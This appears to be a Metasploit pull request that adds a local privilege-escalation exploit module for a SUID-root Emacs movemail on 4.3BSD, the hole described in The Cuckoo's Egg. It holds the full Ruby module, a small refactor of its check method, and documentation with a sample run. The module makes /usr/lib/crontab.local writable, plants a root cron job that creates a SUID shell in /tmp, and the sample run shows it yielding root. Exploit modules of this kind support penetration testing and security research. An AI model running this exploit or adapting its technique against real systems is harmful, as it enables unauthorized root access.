### PR TITLE
Add Emacs movemail local exploit against 4.3BSD, inspired by The Cuckoo's Egg

### DIFF
--- a/documentation/modules/exploit/unix/local/emacs_movemail.md
+++ b/documentation/modules/exploit/unix/local/emacs_movemail.md
@@ -1,0 +1,61 @@
+## Intro
+
+This module exploits a SUID installation of the Emacs `movemail` utility
+to run a command as root by writing to 4.3BSD's `/usr/lib/crontab.local`.
+The vulnerability is documented in Cliff Stoll's book *The Cuckoo's Egg*.
+
+## Setup
+
+A Docker environment for 4.3BSD on VAX is available at
+<https://github.com/wvu/ye-olde-bsd>.
+
+For manual setup, please follow the Computer History Wiki's
+[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
+Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
+you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   /usr/lib/crontab.local
+```
+
+## Options
+
+**MOVEMAIL**
+
+Set this to the absolute path to the SUID-root `movemail` executable.
+
+**CMD**
+
+If your payload is `cmd/unix/generic` (suggested default), set this to
+the command you want to run as root. The provided default will create a
+SUID-root shell at `/tmp/sh`.
+
+## Usage
+
+```
+msf5 exploit(unix/local/emacs_movemail) > run
+
+[*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc
+[*] Current shell is /bin/sh
+[*] $PATH is /bin:/usr/bin:/usr/ucb:/etc
+[+] SUID-root [redacted] found
+[*] Preparing crontab with payload
+* * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh
+* * * * * root rm -f /usr/lib/crontab.local
+[*] Creating writable /usr/lib/crontab.local
+[+] Writing crontab to /usr/lib/crontab.local
+[!] Please wait at least one minute for effect
+[*] Exploit completed, but no session was created.
+msf5 exploit(unix/local/emacs_movemail) > sessions -1
+[*] Starting interaction with 1...
+
+ls -l /usr/lib/crontab.local /tmp/sh
+/usr/lib/crontab.local not found
+-rwsr-xr-x  1 root        23552 Nov 22 15:17 /tmp/sh
+/tmp/sh -c whoami
+root
+```

--- a/modules/exploits/unix/local/emacs_movemail.rb
+++ b/modules/exploits/unix/local/emacs_movemail.rb
@@ -109,22 +109,22 @@ class MetasploitModule < Msf::Exploit::Local
       vprint_warning('System does not appear to be 4.3BSD')
     end
 
-    if file?(movemail)
-      unless movemail.end_with?('movemail')
-        vprint_warning("#{movemail} has an unexpected name")
-      end
+    unless file?(movemail)
+      vprint_bad("#{movemail} not found")
+      return CheckCode::Safe
+    end
 
-      if setuid_root?(movemail)
-        vprint_good("SUID-root #{movemail} found")
-        return CheckCode::Appears
-      end
+    unless movemail.end_with?('movemail')
+      vprint_warning("#{movemail} has an unexpected name")
+    end
 
+    unless setuid_root?(movemail)
       vprint_status("Non-SUID-root #{movemail} found")
       return CheckCode::Detected
     end
 
-    vprint_bad("#{movemail} not found")
-    CheckCode::Safe
+    vprint_good("SUID-root #{movemail} found")
+    CheckCode::Appears
   end
 
   def exploit

--- a/modules/exploits/unix/local/emacs_movemail.rb
+++ b/modules/exploits/unix/local/emacs_movemail.rb
@@ -1,0 +1,163 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Emacs movemail Privilege Escalation',
+      'Description'    => %q{
+        This module exploits a SUID installation of the Emacs movemail utility
+        to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.
+        The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.
+      },
+      'Author'         => [
+        'Markus Hess', # Discovery? atrun(8) exploit for sure
+        'Cliff Stoll', # The Cuckoo's Egg hacker tracker
+        'wvu'          # Module and additional research
+      ],
+      'References'     => [
+        %w[URL https://en.wikipedia.org/wiki/Movemail],
+        %w[URL https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg],
+        %w[URL http://pdf.textfiles.com/academics/wilyhacker.pdf],
+        %w[URL https://www.gnu.org/software/emacs/manual/html_node/efaq/Security-risks-with-Emacs.html],
+        %w[URL https://www.gnu.org/software/emacs/manual/html_node/emacs/Movemail.html],
+        %w[URL https://mailutils.org/manual/html_node/movemail.html]
+      ],
+      'DisclosureDate' => '1986-08-01', # Day unknown, assuming first of month
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'SessionTypes'   => %w[shell],
+      'Privileged'     => true,
+      'Payload'        => {'BadChars' => "\n", 'Encoder' => 'generic/none'},
+      'Targets'        => [['/usr/lib/crontab.local', {}]],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'PAYLOAD'      => 'cmd/unix/generic',
+        'CMD'          => 'cp /bin/sh /tmp && chmod u+s /tmp/sh'
+      }
+    ))
+
+    register_options([
+      OptString.new('MOVEMAIL', [true, 'Path to movemail', '/etc/movemail'])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ])
+  end
+
+  def bin_path
+    '/bin:/usr/bin:/usr/ucb:/etc'
+  end
+
+  def movemail
+    datastore['MOVEMAIL']
+  end
+
+  def crontab_local
+    '/usr/lib/crontab.local'
+  end
+
+  def crontab(cmd)
+    "* * * * * root #{cmd}\n* * * * * root rm -f #{crontab_local}"
+  end
+
+  # uname(1) does not exist, technique from /etc/rc.local
+  def is_43bsd?
+    cmd_exec('strings /vmunix | grep UNIX').include?('4.3 BSD')
+  end
+
+  # id(1) does not exist
+  def is_root?
+    cmd_exec('whoami').include?('root')
+  end
+
+  # test -u does not exist
+  def setuid_root?(path)
+    cmd_exec("find #{path} -user root -perm -4000 -print").include?(path)
+  end
+
+  def setup
+    super
+
+    vprint_status("Setting a sane $PATH: #{bin_path}")
+
+    case cmd_exec('echo $SHELL')
+    when %r{/bin/sh}
+      vprint_status('Current shell is /bin/sh')
+      cmd_exec("PATH=#{bin_path}; export PATH")
+    when %r{/bin/csh}
+      vprint_status('Current shell is /bin/csh')
+      cmd_exec("setenv PATH #{bin_path}")
+    else
+      vprint_bad('Current shell is unknown')
+    end
+
+    vprint_status("$PATH is #{cmd_exec('echo $PATH').chomp}")
+  end
+
+  def check
+    unless is_43bsd?
+      vprint_warning('System does not appear to be 4.3BSD')
+    end
+
+    if file?(movemail)
+      unless movemail.end_with?('movemail')
+        vprint_warning("#{movemail} has an unexpected name")
+      end
+
+      if setuid_root?(movemail)
+        vprint_good("SUID-root #{movemail} found")
+        return CheckCode::Appears
+      end
+
+      vprint_status("Non-SUID-root #{movemail} found")
+      return CheckCode::Detected
+    end
+
+    vprint_bad("#{movemail} not found")
+    CheckCode::Safe
+  end
+
+  def exploit
+    if is_root?
+      print_good('Session is already root, executing payload directly')
+      return cmd_exec(payload.encoded)
+    end
+
+    unless check == CheckCode::Appears || datastore['ForceExploit']
+      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+    end
+
+    # outdesc = open (outname, O_WRONLY | O_CREAT | O_EXCL, 0666);
+    if file?(crontab_local)
+      fail_with(Failure::NoTarget, "#{crontab_local} already exists")
+    end
+
+    print_status('Preparing crontab with payload')
+    tab = crontab(payload.encoded)
+    vprint_line(tab)
+
+    # umask (umask (0) & 0333);
+    # (void) ftruncate (indesc, 0L);
+    print_status("Creating writable #{crontab_local}")
+    cmd_exec("(umask 0 && #{movemail} /dev/null #{crontab_local})")
+
+    unless writable?(crontab_local)
+      fail_with(Failure::NoAccess, "#{crontab_local} is not writable")
+    end
+
+    print_good("Writing crontab to #{crontab_local}")
+    cmd_exec("echo '#{tab.gsub("'", "'\\\\''")}' > #{crontab_local}")
+    print_warning('Please wait at least one minute for effect')
+  end
+
+end


### PR DESCRIPTION
```
msf5 exploit(unix/local/emacs_movemail) > info

       Name: Emacs movemail Privilege Escalation
     Module: exploit/unix/local/emacs_movemail
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 1986-08-01

Provided by:
  Markus Hess
  Cliff Stoll
  wvu <wvu@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   /usr/lib/crontab.local

Check supported:
  Yes

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  MOVEMAIL  /etc/movemail    yes       Path to movemail
  SESSION                    yes       The session to run this module on.

Payload information:
  Avoid: 1 characters

Description:
  This module exploits a SUID installation of the Emacs movemail
  utility to run a command as root by writing to 4.3BSD's
  /usr/lib/crontab.local. The vulnerability is documented in Cliff
  Stoll's book The Cuckoo's Egg.

References:
  CVE: Not available
  https://en.wikipedia.org/wiki/Movemail
  https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg
  http://pdf.textfiles.com/academics/wilyhacker.pdf
  https://www.gnu.org/software/emacs/manual/html_node/efaq/Security-risks-with-Emacs.html
  https://www.gnu.org/software/emacs/manual/html_node/emacs/Movemail.html
  https://mailutils.org/manual/html_node/movemail.html
```